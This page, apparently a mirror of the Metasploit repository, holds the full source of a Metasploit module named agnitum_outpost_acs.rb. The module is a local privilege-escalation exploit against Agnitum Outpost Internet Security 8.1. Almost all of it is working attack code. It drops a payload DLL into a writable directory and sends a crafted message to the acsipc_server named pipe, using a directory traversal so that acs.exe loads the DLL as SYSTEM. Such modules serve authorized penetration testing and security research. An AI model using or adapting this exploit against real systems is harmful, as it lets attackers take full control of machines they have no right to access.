Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/local/agnitum_outpost_acs.rb
Views: 11655
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Msf::Exploit::EXE9include Msf::Post::File10include Msf::Post::Windows::Priv11include Msf::Post::Windows::Process12include Msf::Exploit::FileDropper1314def initialize(info = {})15super(16update_info(17info,18{19'Name' => 'Agnitum Outpost Internet Security Local Privilege Escalation',20'Description' => %q{21This module exploits a directory traversal vulnerability on Agnitum Outpost Internet22Security 8.1. The vulnerability exists in the acs.exe component, allowing the user to load23arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary24code with SYSTEM privileges. This module has been tested successfully on Windows 7 SP1 with25Agnitum Outpost Internet Security 8.1 (32 bits and 64 bits versions).26},27'License' => MSF_LICENSE,28'Author' => [29'Ahmad Moghimi', # Vulnerability discovery30'juan vazquez' # MSF module31],32'Arch' => [ARCH_X86, ARCH_X64],33'Platform' => 'win',34'SessionTypes' => [ 'meterpreter' ],35'Privileged' => true,36'Targets' => [37[ 'Agnitum Outpost Internet Security 8.1', {} ],38],39'Payload' => {40'Space' => 2048,41'DisableNops' => true42},43'References' => [44[ 'OSVDB', '96208' ],45[ 'EDB', '27282' ]46],47'DisclosureDate' => '2013-08-02',48'DefaultTarget' => 0,49'Compat' => {50'Meterpreter' => {51'Commands' => %w[52stdapi_railgun_api53stdapi_sys_config_getenv54]55}56}57}58)59)6061register_options([62# It is OptPath becuase it's a *remote* path63OptString.new("WritableDir", [ false, "A directory where we can write files (%TEMP% by default)" ]),64# By default acs.exe lives on C:\Program Files\Agnitum\Outpost Security Suite Pro\65OptInt.new("DEPTH", [ true, "Traversal depth", 3 ])66])67end6869def junk70return rand_text_alpha(4).unpack("V").first71end7273def open_named_pipe(pipe)74invalid_handle_value = 0xFFFFFFFF7576r = session.railgun.kernel32.CreateFileA(pipe, "GENERIC_READ | GENERIC_WRITE", 0x3, nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL", 0)7778handle = r['return']7980if handle == invalid_handle_value81return nil82end8384return handle85end8687def write_named_pipe(handle, dll_path, dll_name)88traversal_path = "..\\" * datastore["DEPTH"]89traversal_path << dll_path.gsub(/^[a-zA-Z]+:\\/, "")90traversal_path << "\\#{dll_name}"9192path = Rex::Text.to_unicode(traversal_path)9394data = "\x00" * 0x1195data << path96data << "\x00\x00"97data << "\x00\x00\x00"9899buf = [0xd48a445e, 0x466e1597, 0x327416ba, 0x68ccde15].pack("V*") # GUID common_handler100buf << [0x17].pack("V") # command101buf << [junk].pack("V")102buf << [data.length].pack("V")103buf << [0, 0, 0].pack("V*")104buf << data105106w = client.railgun.kernel32.WriteFile(handle, buf, buf.length, 4, nil)107108if w['return'] == false109print_error("The was an error writing to disk, check permissions")110return nil111end112113return w['lpNumberOfBytesWritten']114end115116def check117handle = open_named_pipe("\\\\.\\pipe\\acsipc_server")118if handle.nil?119return Exploit::CheckCode::Safe120end121122session.railgun.kernel32.CloseHandle(handle)123return Exploit::CheckCode::Detected124end125126def exploit127temp_dir = ""128129print_status("Opening named pipe...")130handle = open_named_pipe("\\\\.\\pipe\\acsipc_server")131if handle.nil?132fail_with(Failure::NoTarget, "\\\\.\\pipe\\acsipc_server named pipe not found")133else134print_good("\\\\.\\pipe\\acsipc_server found! Proceeding...")135end136137if datastore["WritableDir"] and not datastore["WritableDir"].empty?138temp_dir = datastore["WritableDir"]139else140temp_dir = client.sys.config.getenv('TEMP')141end142143print_status("Using #{temp_dir} to drop malicious DLL...")144begin145cd(temp_dir)146rescue Rex::Post::Meterpreter::RequestError147session.railgun.kernel32.CloseHandle(handle)148fail_with(Failure::BadConfig, "Failed to use the #{temp_dir} directory")149end150151print_status("Writing malicious DLL to remote filesystem")152write_path = pwd153dll_name = "#{rand_text_alpha(10 + rand(10))}.dll"154begin155# Agnitum Outpost Internet Security doesn't complain when dropping the dll to filesystem156write_file(dll_name, generate_payload_dll)157register_file_for_cleanup("#{write_path}\\#{dll_name}")158rescue Rex::Post::Meterpreter::RequestError159session.railgun.kernel32.CloseHandle(handle)160fail_with(Failure::BadConfig, "Failed to drop payload into #{temp_dir}")161end162163print_status("Exploiting through \\\\.\\pipe\\acsipc_server...")164bytes = write_named_pipe(handle, write_path, dll_name)165session.railgun.kernel32.CloseHandle(handle)166167if bytes.nil?168fail_with(Failure::Unknown, "Failed while writing to \\\\.\\pipe\\acsipc_server")169end170end171end172173174